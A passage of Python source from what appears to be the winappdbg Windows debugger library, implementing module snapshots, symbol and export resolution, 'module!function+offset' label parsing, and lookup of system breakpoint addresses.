for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if symbol == SymbolName.lower():
return SymbolAddress
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
try:
SymbolName = win32.UnDecorateSymbolName(SymbolName)
except Exception:
continue
if symbol == SymbolName.lower():
return SymbolAddress
def get_symbol_at_address(self, address):
"""
Tries to find the closest matching symbol for the given address.
@type address: int
@param address: Memory address to query.
@rtype: None or tuple( str, int, int )
@return: Returns a tuple consisting of:
- Name
- Address
- Size (in bytes)
Returns C{None} if no symbol could be matched.
"""
found = None
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if SymbolAddress > address:
continue
if SymbolAddress + SymbolSize > address:
if not found or found[1] < SymbolAddress:
found = (SymbolName, SymbolAddress, SymbolSize)
return found
#------------------------------------------------------------------------------
def get_label(self, function = None, offset = None):
"""
Retrieves the label for the given function of this module or the module
base address if no function name is given.
@type function: str
@param function: (Optional) Exported function name.
@type offset: int
@param offset: (Optional) Offset from the module base address.
@rtype: str
@return: Label for the module base address, plus the offset if given.
"""
return _ModuleContainer.parse_label(self.get_name(), function, offset)
def get_label_at_address(self, address, offset = None):
"""
Creates a label from the given memory address.
If the address belongs to the module, the label is made relative to
it's base address.
@type address: int
@param address: Memory address.
@type offset: None or int
@param offset: (Optional) Offset value.
@rtype: str
@return: Label pointing to the given address.
"""
# Add the offset to the address.
if offset:
address = address + offset
# Make the label relative to the base address if no match is found.
module = self.get_name()
function = None
offset = address - self.get_base()
# Make the label relative to the entrypoint if no other match is found.
# Skip if the entry point is unknown.
start = self.get_entry_point()
if start and start <= address:
function = "start"
offset = address - start
# Enumerate exported functions and debug symbols,
# then find the closest match, if possible.
try:
symbol = self.get_symbol_at_address(address)
if symbol:
(SymbolName, SymbolAddress, SymbolSize) = symbol
new_offset = address - SymbolAddress
if new_offset <= offset:
function = SymbolName
offset = new_offset
except WindowsError:
pass
# Parse the label and return it.
return _ModuleContainer.parse_label(module, function, offset)
def is_address_here(self, address):
"""
Tries to determine if the given address belongs to this module.
@type address: int
@param address: Memory address.
@rtype: bool or None
@return: C{True} if the address belongs to the module,
C{False} if it doesn't,
and C{None} if it can't be determined.
"""
base = self.get_base()
size = self.get_size()
if base and size:
return base <= address < (base + size)
return None
def resolve(self, function):
"""
Resolves a function exported by this module.
@type function: str or int
@param function:
str: Name of the function.
int: Ordinal of the function.
@rtype: int
@return: Memory address of the exported function in the process.
Returns None on error.
"""
# Unknown DLL filename, there's nothing we can do.
filename = self.get_filename()
if not filename:
return None
# If the DLL is already mapped locally, resolve the function.
try:
hlib = win32.GetModuleHandle(filename)
address = win32.GetProcAddress(hlib, function)
except WindowsError:
# Load the DLL locally, resolve the function and unload it.
try:
hlib = win32.LoadLibraryEx(filename,
win32.DONT_RESOLVE_DLL_REFERENCES)
try:
address = win32.GetProcAddress(hlib, function)
finally:
win32.FreeLibrary(hlib)
except WindowsError:
return None
# A NULL pointer means the function was not found.
if address in (None, 0):
return None
# Compensate for DLL base relocations locally and remotely.
return address - hlib + self.lpBaseOfDll
def resolve_label(self, label):
"""
Resolves a label for this module only. If the label refers to another
module, an exception is raised.
@type label: str
@param label: Label to resolve.
@rtype: int
@return: Memory address pointed to by the label.
@raise ValueError: The label is malformed or impossible to resolve.
@raise RuntimeError: Cannot resolve the module or function.
"""
# Split the label into it's components.
# Use the fuzzy mode whenever possible.
aProcess = self.get_process()
if aProcess is not None:
(module, procedure, offset) = aProcess.split_label(label)
else:
(module, procedure, offset) = _ModuleContainer.split_label(label)
# If a module name is given that doesn't match ours,
# raise an exception.
if module and not self.match_name(module):
raise RuntimeError("Label does not belong to this module")
# Resolve the procedure if given.
if procedure:
address = self.resolve(procedure)
if address is None:
# If it's a debug symbol, use the symbol.
address = self.resolve_symbol(procedure)
# If it's the keyword "start" use the entry point.
if address is None and procedure == "start":
address = self.get_entry_point()
# The procedure was not found.
if address is None:
if not module:
module = self.get_name()
msg = "Can't find procedure %s in module %s"
raise RuntimeError(msg % (procedure, module))
# If no procedure is given use the base address of the module.
else:
address = self.get_base()
# Add the offset if given and return the resolved address.
if offset:
address = address + offset
return address
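# Usage sketch (assumes `aProcess` is a live winappdbg Process attached to a
# target): the typical workflow of locating a module by name and resolving an
# exported function directly and through a label, cf. resolve()/resolve_label().
def _example_resolve_export(aProcess):
    aProcess.scan_modules()
    mod = aProcess.get_module_by_name('kernel32.dll')
    address = mod.resolve('Beep')              # export by name
    same = mod.resolve_label('kernel32!Beep')  # same address via a label
    return address, same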
#==============================================================================
# TODO
# An alternative approach to the toolhelp32 snapshots: parsing the PEB and
# fetching the list of loaded modules from there. That would solve the problem
# of toolhelp32 not working when the process hasn't finished initializing.
# See: http://pferrie.host22.com/misc/lowlevel3.htm
class _ModuleContainer (object):
"""
Encapsulates the capability to contain Module objects.
@note: Labels are an approximated way of referencing memory locations
across different executions of the same process, or different processes
with common modules. They are not meant to be perfectly unique, and
some errors may occur when multiple modules with the same name are
loaded, or when module filenames can't be retrieved.
@group Modules snapshot:
scan_modules,
get_module, get_module_bases, get_module_count,
get_module_at_address, get_module_by_name,
has_module, iter_modules, iter_module_addresses,
clear_modules
@group Labels:
parse_label, split_label, sanitize_label, resolve_label,
resolve_label_components, get_label_at_address, split_label_strict,
split_label_fuzzy
@group Symbols:
load_symbols, unload_symbols, get_symbols, iter_symbols,
resolve_symbol, get_symbol_at_address
@group Debugging:
is_system_defined_breakpoint, get_system_breakpoint,
get_user_breakpoint, get_breakin_breakpoint,
get_wow64_system_breakpoint, get_wow64_user_breakpoint,
get_wow64_breakin_breakpoint, get_break_on_error_ptr
"""
def __init__(self):
self.__moduleDict = dict()
self.__system_breakpoints = dict()
# Replace split_label with the fuzzy version on object instances.
self.split_label = self.__use_fuzzy_mode
def __initialize_snapshot(self):
"""
Private method to automatically initialize the snapshot
when you try to use it without calling any of the scan_*
methods first. You don't need to call this yourself.
"""
if not self.__moduleDict:
try:
self.scan_modules()
except WindowsError:
pass
def __contains__(self, anObject):
"""
@type anObject: L{Module}, int
@param anObject:
- C{Module}: Module object to look for.
- C{int}: Base address of the DLL to look for.
@rtype: bool
@return: C{True} if the snapshot contains
a L{Module} object with the same base address.
"""
if isinstance(anObject, Module):
anObject = anObject.lpBaseOfDll
return self.has_module(anObject)
def __iter__(self):
"""
@see: L{iter_modules}
@rtype: dictionary-valueiterator
@return: Iterator of L{Module} objects in this snapshot.
"""
return self.iter_modules()
def __len__(self):
"""
@see: L{get_module_count}
@rtype: int
@return: Count of L{Module} objects in this snapshot.
"""
return self.get_module_count()
def has_module(self, lpBaseOfDll):
"""
@type lpBaseOfDll: int
@param lpBaseOfDll: Base address of the DLL to look for.
@rtype: bool
@return: C{True} if the snapshot contains a
L{Module} object with the given base address.
"""
self.__initialize_snapshot()
return lpBaseOfDll in self.__moduleDict
def get_module(self, lpBaseOfDll):
"""
@type lpBaseOfDll: int
@param lpBaseOfDll: Base address of the DLL to look for.
@rtype: L{Module}
@return: Module object with the given base address.
"""
self.__initialize_snapshot()
if lpBaseOfDll not in self.__moduleDict:
msg = "Unknown DLL base address %s"
msg = msg % HexDump.address(lpBaseOfDll)
raise KeyError(msg)
return self.__moduleDict[lpBaseOfDll]
def iter_module_addresses(self):
"""
@see: L{iter_modules}
@rtype: dictionary-keyiterator
@return: Iterator of DLL base addresses in this snapshot.
"""
self.__initialize_snapshot()
return compat.iterkeys(self.__moduleDict)
def iter_modules(self):
"""
@see: L{iter_module_addresses}
@rtype: dictionary-valueiterator
@return: Iterator of L{Module} objects in this snapshot.
"""
self.__initialize_snapshot()
return compat.itervalues(self.__moduleDict)
def get_module_bases(self):
"""
@see: L{iter_module_addresses}
@rtype: list( int... )
@return: List of DLL base addresses in this snapshot.
"""
self.__initialize_snapshot()
return compat.keys(self.__moduleDict)
def get_module_count(self):
"""
@rtype: int
@return: Count of L{Module} objects in this snapshot.
"""
self.__initialize_snapshot()
return len(self.__moduleDict)
#------------------------------------------------------------------------------
def get_module_by_name(self, modName):
"""
        @type modName: str
@param modName:
Name of the module to look for, as returned by L{Module.get_name}.
If two or more modules with the same name are loaded, only one
of the matching modules is returned.
You can also pass a full pathname to the DLL file.
This works correctly even if two modules with the same name
are loaded from different paths.
@rtype: L{Module}
@return: C{Module} object that best matches the given name.
Returns C{None} if no C{Module} can be found.
"""
# Convert modName to lowercase.
# This helps make case insensitive string comparisons.
modName = modName.lower()
# modName is an absolute pathname.
if PathOperations.path_is_absolute(modName):
for lib in self.iter_modules():
if modName == lib.get_filename().lower():
return lib
return None # Stop trying to match the name.
# Get all the module names.
# This prevents having to iterate through the module list
# more than once.
modDict = [ ( lib.get_name(), lib ) for lib in self.iter_modules() ]
modDict = dict(modDict)
# modName is a base filename.
if modName in modDict:
return modDict[modName]
# modName is a base filename without extension.
filepart, extpart = PathOperations.split_extension(modName)
if filepart and extpart:
if filepart in modDict:
return modDict[filepart]
# modName is a base address.
try:
baseAddress = HexInput.integer(modName)
except ValueError:
return None
if self.has_module(baseAddress):
return self.get_module(baseAddress)
# Module not found.
return None
def get_module_at_address(self, address):
"""
@type address: int
@param address: Memory address to query.
@rtype: L{Module}
@return: C{Module} object that best matches the given address.
Returns C{None} if no C{Module} can be found.
"""
bases = self.get_module_bases()
bases.sort()
bases.append(long(0x10000000000000000)) # max. 64 bit address + 1
if address >= bases[0]:
i = 0
max_i = len(bases) - 1
while i < max_i:
begin, end = bases[i:i+2]
if begin <= address < end:
module = self.get_module(begin)
here = module.is_address_here(address)
if here is False:
break
else: # True or None
return module
i = i + 1
return None
    # XXX this method mustn't end up calling __initialize_snapshot by accident!
def scan_modules(self):
"""
Populates the snapshot with loaded modules.
"""
# The module filenames may be spoofed by malware,
# since this information resides in usermode space.
# See: http://www.ragestorm.net/blogs/?p=163
# Ignore special process IDs.
# PID 0: System Idle Process. Also has a special meaning to the
# toolhelp APIs (current process).
# PID 4: System Integrity Group. See this forum post for more info:
# http://tinyurl.com/ycza8jo
# (points to social.technet.microsoft.com)
# Only on XP and above
# PID 8: System (?) only in Windows 2000 and below AFAIK.
# It's probably the same as PID 4 in XP and above.
dwProcessId = self.get_pid()
if dwProcessId in (0, 4, 8):
return
# It would seem easier to clear the snapshot first.
# But then all open handles would be closed.
found_bases = set()
with win32.CreateToolhelp32Snapshot(win32.TH32CS_SNAPMODULE,
dwProcessId) as hSnapshot:
me = win32.Module32First(hSnapshot)
while me is not None:
lpBaseAddress = me.modBaseAddr
fileName = me.szExePath # full pathname
if not fileName:
fileName = me.szModule # filename only
if not fileName:
fileName = None
else:
fileName = PathOperations.native_to_win32_pathname(fileName)
found_bases.add(lpBaseAddress)
## if not self.has_module(lpBaseAddress): # XXX triggers a scan
if lpBaseAddress not in self.__moduleDict:
aModule = Module(lpBaseAddress, fileName = fileName,
SizeOfImage = me.modBaseSize,
process = self)
self._add_module(aModule)
else:
aModule = self.get_module(lpBaseAddress)
if not aModule.fileName:
aModule.fileName = fileName
if not aModule.SizeOfImage:
aModule.SizeOfImage = me.modBaseSize
if not aModule.process:
aModule.process = self
me = win32.Module32Next(hSnapshot)
## for base in self.get_module_bases(): # XXX triggers a scan
for base in compat.keys(self.__moduleDict):
if base not in found_bases:
self._del_module(base)
def clear_modules(self):
"""
Clears the modules snapshot.
"""
for aModule in compat.itervalues(self.__moduleDict):
aModule.clear()
self.__moduleDict = dict()
#------------------------------------------------------------------------------
@staticmethod
def parse_label(module = None, function = None, offset = None):
"""
Creates a label from a module and a function name, plus an offset.
@warning: This method only creates the label, it doesn't make sure the
label actually points to a valid memory location.
@type module: None or str
@param module: (Optional) Module name.
@type function: None, str or int
@param function: (Optional) Function name or ordinal.
@type offset: None or int
@param offset: (Optional) Offset value.
If C{function} is specified, offset from the function.
If C{function} is C{None}, offset from the module.
@rtype: str
@return:
Label representing the given function in the given module.
@raise ValueError:
            The module or function name contains invalid characters.
"""
# TODO
# Invalid characters should be escaped or filtered.
# Convert ordinals to strings.
try:
function = "#0x%x" % function
except TypeError:
pass
# Validate the parameters.
if module is not None and ('!' in module or '+' in module):
raise ValueError("Invalid module name: %s" % module)
if function is not None and ('!' in function or '+' in function):
raise ValueError("Invalid function name: %s" % function)
# Parse the label.
if module:
if function:
if offset:
label = "%s!%s+0x%x" % (module, function, offset)
else:
label = "%s!%s" % (module, function)
else:
if offset:
## label = "%s+0x%x!" % (module, offset)
label = "%s!0x%x" % (module, offset)
else:
label = "%s!" % module
else:
if function:
if offset:
label = "!%s+0x%x" % (function, offset)
else:
label = "!%s" % function
else:
if offset:
label = "0x%x" % offset
else:
label = "0x0"
return label
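    # Illustrative results of parse_label (examples added here for clarity,
    # following the syntax described in the docstring above):
    #   parse_label("kernel32", "CreateFileA", 0x10) -> "kernel32!CreateFileA+0x10"
    #   parse_label("kernel32", None, 0x1000)        -> "kernel32!0x1000"
    #   parse_label(None, None, None)                -> "0x0"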
@staticmethod
def split_label_strict(label):
"""
Splits a label created with L{parse_label}.
To parse labels with a less strict syntax, use the L{split_label_fuzzy}
method instead.
@warning: This method only parses the label, it doesn't make sure the
label actually points to a valid memory location.
@type label: str
@param label: Label to split.
@rtype: tuple( str or None, str or int or None, int or None )
@return: Tuple containing the C{module} name,
the C{function} name or ordinal, and the C{offset} value.
If the label doesn't specify a module,
then C{module} is C{None}.
If the label doesn't specify a function,
then C{function} is C{None}.
If the label doesn't specify an offset,
then C{offset} is C{0}.
@raise ValueError: The label is malformed.
"""
module = function = None
offset = 0
# Special case: None
if not label:
label = "0x0"
else:
# Remove all blanks.
label = label.replace(' ', '')
label = label.replace('\t', '')
label = label.replace('\r', '')
label = label.replace('\n', '')
# Special case: empty label.
if not label:
label = "0x0"
# * ! *
if '!' in label:
try:
module, function = label.split('!')
except ValueError:
raise ValueError("Malformed label: %s" % label)
# module ! function
if function:
if '+' in module:
raise ValueError("Malformed label: %s" % label)
# module ! function + offset
if '+' in function:
try:
function, offset = function.split('+')
except ValueError:
raise ValueError("Malformed label: %s" % label)
try:
offset = HexInput.integer(offset)
except ValueError:
raise ValueError("Malformed label: %s" % label)
else:
# module ! offset
try:
offset = HexInput.integer(function)
function = None
except ValueError:
pass
else:
# module + offset !
if '+' in module:
try:
module, offset = module.split('+')
except ValueError:
raise ValueError("Malformed label: %s" % label)
try:
offset = HexInput.integer(offset)
except ValueError:
raise ValueError("Malformed label: %s" % label)
else:
# module !
try:
offset = HexInput.integer(module)
module = None
# offset !
except ValueError:
pass
if not module:
module = None
if not function:
function = None
# *
else:
# offset
try:
offset = HexInput.integer(label)
# # ordinal
except ValueError:
if label.startswith('#'):
function = label
try:
HexInput.integer(function[1:])
# module?
# function?
except ValueError:
raise ValueError("Ambiguous label: %s" % label)
# module?
# function?
else:
raise ValueError("Ambiguous label: %s" % label)
# Convert function ordinal strings into integers.
if function and function.startswith('#'):
try:
function = HexInput.integer(function[1:])
except ValueError:
pass
# Convert null offsets to None.
if not offset:
offset = None
return (module, function, offset)
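    # Illustrative results of split_label_strict (examples added here for clarity):
    #   split_label_strict("kernel32!CreateFileA+0x10") -> ("kernel32", "CreateFileA", 0x10)
    #   split_label_strict("kernel32!0x1000")           -> ("kernel32", None, 0x1000)
    #   split_label_strict("0x401000")                  -> (None, None, 0x401000)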
def split_label_fuzzy(self, label):
"""
Splits a label entered as user input.
        It is more flexible in its syntax parsing than the L{split_label_strict}
method, as it allows the exclamation mark (B{C{!}}) to be omitted. The
ambiguity is resolved by searching the modules in the snapshot to guess
if a label refers to a module or a function. It also tries to rebuild
labels when they contain hardcoded addresses.
@warning: This method only parses the label, it doesn't make sure the
label actually points to a valid memory location.
@type label: str
@param label: Label to split.
@rtype: tuple( str or None, str or int or None, int or None )
@return: Tuple containing the C{module} name,
the C{function} name or ordinal, and the C{offset} value.
If the label doesn't specify a module,
then C{module} is C{None}.
If the label doesn't specify a function,
then C{function} is C{None}.
If the label doesn't specify an offset,
then C{offset} is C{0}.
@raise ValueError: The label is malformed.
"""
module = function = None
offset = 0
# Special case: None
if not label:
label = compat.b("0x0")
else:
# Remove all blanks.
label = label.replace(compat.b(' '), compat.b(''))
label = label.replace(compat.b('\t'), compat.b(''))
label = label.replace(compat.b('\r'), compat.b(''))
label = label.replace(compat.b('\n'), compat.b(''))
# Special case: empty label.
if not label:
label = compat.b("0x0")
# If an exclamation sign is present, we know we can parse it strictly.
if compat.b('!') in label:
return self.split_label_strict(label)
## # Try to parse it strictly, on error do it the fuzzy way.
## try:
## return self.split_label(label)
## except ValueError:
## pass
# * + offset
if compat.b('+') in label:
try:
prefix, offset = label.split(compat.b('+'))
except ValueError:
raise ValueError("Malformed label: %s" % label)
try:
offset = HexInput.integer(offset)
except ValueError:
raise ValueError("Malformed label: %s" % label)
label = prefix
# This parses both filenames and base addresses.
modobj = self.get_module_by_name(label)
if modobj:
# module
# module + offset
module = modobj.get_name()
else:
# TODO
# If 0xAAAAAAAA + 0xBBBBBBBB is given,
# A is interpreted as a module base address,
# and B as an offset.
# If that fails, it'd be good to add A+B and try to
# use the nearest loaded module.
# offset
# base address + offset (when no module has that base address)
try:
address = HexInput.integer(label)
if offset:
# If 0xAAAAAAAA + 0xBBBBBBBB is given,
# A is interpreted as a module base address,
# and B as an offset.
# If that fails, we get here, meaning no module was found
# at A. Then add up A+B and work with that as a hardcoded
# address.
offset = address + offset
else:
# If the label is a hardcoded address, we get here.
offset = address
# If only a hardcoded address is given,
# rebuild the label using get_label_at_address.
# Then parse it again, but this time strictly,
# both because there is no need for fuzzy syntax and
# to prevent an infinite recursion if there's a bug here.
try:
new_label = self.get_label_at_address(offset)
module, function, offset = \
self.split_label_strict(new_label)
except ValueError:
pass
# function
# function + offset
except ValueError:
function = label
# Convert function ordinal strings into integers.
if function and function.startswith(compat.b('#')):
try:
function = HexInput.integer(function[1:])
except ValueError:
pass
# Convert null offsets to None.
if not offset:
offset = None
return (module, function, offset)
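    # Illustrative behaviour of split_label_fuzzy (examples added here for
    # clarity; actual results depend on the modules loaded in the process):
    #   split_label_fuzzy("CreateFileA")     -> (None, "CreateFileA", None)  # no module by that name
    #   split_label_fuzzy("kernel32+0x1000") -> ("kernel32", None, 0x1000)   # if kernel32 is loaded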
@classmethod
def split_label(cls, label):
"""
        Splits a label into its C{module}, C{function} and C{offset}
components, as used in L{parse_label}.
When called as a static method, the strict syntax mode is used::
winappdbg.Process.split_label( "kernel32!CreateFileA" )
When called as an instance method, the fuzzy syntax mode is used::
aProcessInstance.split_label( "CreateFileA" )
@see: L{split_label_strict}, L{split_label_fuzzy}
@type label: str
@param label: Label to split.
@rtype: tuple( str or None, str or int or None, int or None )
@return:
Tuple containing the C{module} name,
the C{function} name or ordinal, and the C{offset} value.
If the label doesn't specify a module,
then C{module} is C{None}.
If the label doesn't specify a function,
then C{function} is C{None}.
If the label doesn't specify an offset,
then C{offset} is C{0}.
@raise ValueError: The label is malformed.
"""
# XXX
# Docstring indentation was removed so epydoc doesn't complain
# when parsing the docs for __use_fuzzy_mode().
# This function is overwritten by __init__
# so here is the static implementation only.
return cls.split_label_strict(label)
# The split_label method is replaced with this function by __init__.
def __use_fuzzy_mode(self, label):
"@see: L{split_label}"
return self.split_label_fuzzy(label)
## __use_fuzzy_mode.__doc__ = split_label.__doc__
def sanitize_label(self, label):
"""
Converts a label taken from user input into a well-formed label.
@type label: str
@param label: Label taken from user input.
@rtype: str
@return: Sanitized label.
"""
(module, function, offset) = self.split_label_fuzzy(label)
label = self.parse_label(module, function, offset)
return label
def resolve_label(self, label):
"""
Resolve the memory address of the given label.
@note:
If multiple modules with the same name are loaded,
the label may be resolved at any of them. For a more precise
way to resolve functions use the base address to get the L{Module}
object (see L{Process.get_module}) and then call L{Module.resolve}.
If no module name is specified in the label, the function may be
resolved in any loaded module. If you want to resolve all functions
with that name in all processes, call L{Process.iter_modules} to
iterate through all loaded modules, and then try to resolve the
function in each one of them using L{Module.resolve}.
@type label: str
@param label: Label to resolve.
@rtype: int
@return: Memory address pointed to by the label.
@raise ValueError: The label is malformed or impossible to resolve.
@raise RuntimeError: Cannot resolve the module or function.
"""
# Split the label into module, function and offset components.
module, function, offset = self.split_label_fuzzy(label)
# Resolve the components into a memory address.
address = self.resolve_label_components(module, function, offset)
# Return the memory address.
return address
def resolve_label_components(self, module = None,
function = None,
offset = None):
"""
Resolve the memory address of the given module, function and/or offset.
@note:
If multiple modules with the same name are loaded,
the label may be resolved at any of them. For a more precise
way to resolve functions use the base address to get the L{Module}
object (see L{Process.get_module}) and then call L{Module.resolve}.
If no module name is specified in the label, the function may be
resolved in any loaded module. If you want to resolve all functions
with that name in all processes, call L{Process.iter_modules} to
iterate through all loaded modules, and then try to resolve the
function in each one of them using L{Module.resolve}.
@type module: None or str
@param module: (Optional) Module name.
@type function: None, str or int
@param function: (Optional) Function name or ordinal.
@type offset: None or int
@param offset: (Optional) Offset value.
If C{function} is specified, offset from the function.
If C{function} is C{None}, offset from the module.
@rtype: int
@return: Memory address pointed to by the label.
@raise ValueError: The label is malformed or impossible to resolve.
@raise RuntimeError: Cannot resolve the module or function.
"""
# Default address if no module or function are given.
# An offset may be added later.
address = 0
# Resolve the module.
# If the module is not found, check for the special symbol "main".
if module:
modobj = self.get_module_by_name(module)
if not modobj:
if module == "main":
modobj = self.get_main_module()
else:
raise RuntimeError("Module %r not found" % module)
# Resolve the exported function or debugging symbol.
# If all else fails, check for the special symbol "start".
if function:
address = modobj.resolve(function)
if address is None:
address = modobj.resolve_symbol(function)
if address is None:
if function == "start":
address = modobj.get_entry_point()
if address is None:
msg = "Symbol %r not found in module %s"
raise RuntimeError(msg % (function, module))
# No function, use the base address.
else:
address = modobj.get_base()
# Resolve the function in any module.
# If all else fails, check for the special symbols "main" and "start".
elif function:
for modobj in self.iter_modules():
address = modobj.resolve(function)
if address is not None:
break
if address is None:
if function == "start":
modobj = self.get_main_module()
address = modobj.get_entry_point()
elif function == "main":
modobj = self.get_main_module()
address = modobj.get_base()
else:
msg = "Function %r not found in any module" % function
raise RuntimeError(msg)
# Return the address plus the offset.
if offset:
address = address + offset
return address
def get_label_at_address(self, address, offset = None):
"""
Creates a label from the given memory address.
@warning: This method uses the name of the nearest currently loaded
module. If that module is unloaded later, the label becomes
impossible to resolve.
@type address: int
@param address: Memory address.
@type offset: None or int
@param offset: (Optional) Offset value.
@rtype: str
@return: Label pointing to the given address.
"""
if offset:
address = address + offset
modobj = self.get_module_at_address(address)
if modobj:
label = modobj.get_label_at_address(address)
else:
label = self.parse_label(None, None, address)
return label
#------------------------------------------------------------------------------
    # The memory addresses of system breakpoints are cached, since they're
    # all in system libraries and it's not likely they'll ever change their address
# during the lifetime of the process... I don't suppose a program could
# happily unload ntdll.dll and survive.
def __get_system_breakpoint(self, label):
try:
return self.__system_breakpoints[label]
except KeyError:
try:
address = self.resolve_label(label)
except Exception:
return None
self.__system_breakpoints[label] = address
return address
# It's in kernel32 in Windows Server 2003, in ntdll since Windows Vista.
# It can only be resolved if we have the debug symbols.
def get_break_on_error_ptr(self):
"""
@rtype: int
@return:
If present, returns the address of the C{g_dwLastErrorToBreakOn}
global variable for this process. If not, returns C{None}.
"""
address = self.__get_system_breakpoint("ntdll!g_dwLastErrorToBreakOn")
if not address:
address = self.__get_system_breakpoint(
"kernel32!g_dwLastErrorToBreakOn")
# cheat a little :)
self.__system_breakpoints["ntdll!g_dwLastErrorToBreakOn"] = address
return address
def is_system_defined_breakpoint(self, address):
"""
@type address: int
@param address: Memory address.
@rtype: bool
@return: C{True} if the given address points to a system defined
breakpoint. System defined breakpoints are hardcoded into
system libraries.
"""
if address:
module = self.get_module_at_address(address)
if module:
return module.match_name("ntdll") or \
module.match_name("kernel32")
return False
# FIXME
# In Wine, the system breakpoint seems to be somewhere in kernel32.
def get_system_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the system breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll!DbgBreakPoint")
# I don't know when this breakpoint is actually used...
def get_user_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the user breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll!DbgUserBreakPoint")
# On some platforms, this breakpoint can only be resolved
# when the debugging symbols for ntdll.dll are loaded.
def get_breakin_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the remote breakin breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll!DbgUiRemoteBreakin")
# Equivalent of ntdll!DbgBreakPoint in Wow64.
def get_wow64_system_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the Wow64 system breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll32!DbgBreakPoint")
# Equivalent of ntdll!DbgUserBreakPoint in Wow64.
def get_wow64_user_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the Wow64 user breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll32!DbgUserBreakPoint")
# Equivalent of ntdll!DbgUiRemoteBreakin in Wow64.
def get_wow64_breakin_breakpoint(self):
"""
@rtype: int or None
@return: Memory address of the Wow64 remote breakin breakpoint
within the process address space.
Returns C{None} on error.
"""
return self.__get_system_breakpoint("ntdll32!DbgUiRemoteBreakin")
#------------------------------------------------------------------------------
def load_symbols(self):
"""
Loads the debugging symbols for all modules in this snapshot.
Automatically called by L{get_symbols}.
"""
for aModule in self.iter_modules():
aModule.load_symbols()
def unload_symbols(self):
"""
Unloads the debugging symbols for all modules in this snapshot.
"""
for aModule in self.iter_modules():
aModule.unload_symbols()
def get_symbols(self):
"""
Returns the debugging symbols for all modules in this snapshot.
The symbols are automatically loaded when needed.
@rtype: list of tuple( str, int, int )
@return: List of symbols.
Each symbol is represented by a tuple that contains:
- Symbol name
- Symbol memory address
- Symbol size in bytes
"""
symbols = list()
for aModule in self.iter_modules():
for symbol in aModule.iter_symbols():
symbols.append(symbol)
return symbols
def iter_symbols(self):
"""
Returns an iterator for the debugging symbols in all modules in this
snapshot, in no particular order.
The symbols are automatically loaded when needed.
@rtype: iterator of tuple( str, int, int )
@return: Iterator of symbols.
Each symbol is represented by a tuple that contains:
- Symbol name
- Symbol memory address
- Symbol size in bytes
"""
for aModule in self.iter_modules():
for symbol in aModule.iter_symbols():
yield symbol
def resolve_symbol(self, symbol, bCaseSensitive = False):
"""
Resolves a debugging symbol's address.
@type symbol: str
@param symbol: Name of the symbol to resolve.
@type bCaseSensitive: bool
@param bCaseSensitive: C{True} for case sensitive matches,
C{False} for case insensitive.
@rtype: int or None
@return: Memory address of symbol. C{None} if not found.
"""
if bCaseSensitive:
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if symbol == SymbolName:
return SymbolAddress
else:
symbol = symbol.lower()
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if symbol == SymbolName.lower():
return SymbolAddress
def get_symbol_at_address(self, address):
"""
Tries to find the closest matching symbol for the given address.
@type address: int
@param address: Memory address to query.
@rtype: None or tuple( str, int, int )
@return: Returns a tuple consisting of:
- Name
- Address
- Size (in bytes)
Returns C{None} if no symbol could be matched.
"""
# Any module may have symbols pointing anywhere in memory, so there's
# no easy way to optimize this. I guess we're stuck with brute force.
found = None
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if SymbolAddress > address:
continue
if SymbolAddress == address:
found = (SymbolName, SymbolAddress, SymbolSize)
break
if SymbolAddress < address:
if found and (address - found[1]) < (address - SymbolAddress):
continue
else:
found = (SymbolName, SymbolAddress, SymbolSize)
return found
#------------------------------------------------------------------------------
# XXX _notify_* methods should not trigger a scan
def _add_module(self, aModule):
"""
Private method to add a module object to the snapshot.
@type aModule: L{Module}
@param aModule: Module object.
"""
## if not isinstance(aModule, Module):
## if hasattr(aModule, '__class__'):
## typename = aModule.__class__.__name__
## else:
## typename = str(type(aModule))
## msg = "Expected Module, got %s instead" % typename
## raise TypeError(msg)
lpBaseOfDll = aModule.get_base()
## if lpBaseOfDll in self.__moduleDict:
## msg = "Module already exists: %d" % lpBaseOfDll
## raise KeyError(msg)
aModule.set_process(self)
self.__moduleDict[lpBaseOfDll] = aModule
def _del_module(self, lpBaseOfDll):
"""
Private method to remove a module object from the snapshot.
@type lpBaseOfDll: int
@param lpBaseOfDll: Module base address.
"""
try:
aModule = self.__moduleDict[lpBaseOfDll]
del self.__moduleDict[lpBaseOfDll]
except KeyError:
aModule = None
msg = "Unknown base address %d" % HexDump.address(lpBaseOfDll)
warnings.warn(msg, RuntimeWarning)
if aModule:
aModule.clear() # remove circular references
def __add_loaded_module(self, event):
"""
Private method to automatically add new module objects from debug events.
@type event: L{Event}
@param event: Event object.
"""
lpBaseOfDll = event.get_module_base()
hFile = event.get_file_handle()
## if not self.has_module(lpBaseOfDll): # XXX this would trigger a scan
if lpBaseOfDll not in self.__moduleDict:
fileName = event.get_filename()
if not fileName:
fileName = None
if hasattr(event, 'get_start_address'):
EntryPoint = event.get_start_address()
else:
EntryPoint = None
aModule = Module(lpBaseOfDll, hFile, fileName = fileName,
EntryPoint = EntryPoint,
process = self)
self._add_module(aModule)
else:
aModule = self.get_module(lpBaseOfDll)
if not aModule.hFile and hFile not in (None, 0,
win32.INVALID_HANDLE_VALUE):
aModule.hFile = hFile
if not aModule.process:
aModule.process = self
if aModule.EntryPoint is None and \
hasattr(event, 'get_start_address'):
aModule.EntryPoint = event.get_start_address()
if not aModule.fileName:
fileName = event.get_filename()
if fileName:
aModule.fileName = fileName
def _notify_create_process(self, event):
"""
Notify the load of the main module.
This is done automatically by the L{Debug} class, you shouldn't need
to call it yourself.
@type event: L{CreateProcessEvent}
@param event: Create process event.
@rtype: bool
@return: C{True} to call the user-defined handle, C{False} otherwise.
"""
